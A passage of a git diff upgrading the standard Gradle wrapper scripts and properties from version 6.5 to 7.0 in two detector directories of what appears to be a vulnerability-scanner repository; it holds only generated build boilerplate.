%GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/cve202342793/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/cve202342793/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/cve202342793/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/cve202342793/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/cve202342793/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/cve202342793/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/rce/cve202342793/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/cve202342793/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/rce/cve202342793/gradlew b/google/detectors/rce/cve202342793/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/cve202342793/gradlew +++ b/google/detectors/rce/cve202342793/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/cve202342793/gradlew.bat b/google/detectors/rce/cve202342793/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/cve202342793/gradlew.bat +++ b/google/detectors/rce/cve202342793/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/java_jmx/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/java_jmx/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/java_jmx/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/java_jmx/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/java_jmx/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/java_jmx/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/rce/java_jmx/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/java_jmx/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/rce/java_jmx/gradlew b/google/detectors/rce/java_jmx/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/java_jmx/gradlew +++ b/google/detectors/rce/java_jmx/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/java_jmx/gradlew.bat b/google/detectors/rce/java_jmx/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/java_jmx/gradlew.bat +++ b/google/detectors/rce/java_jmx/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle 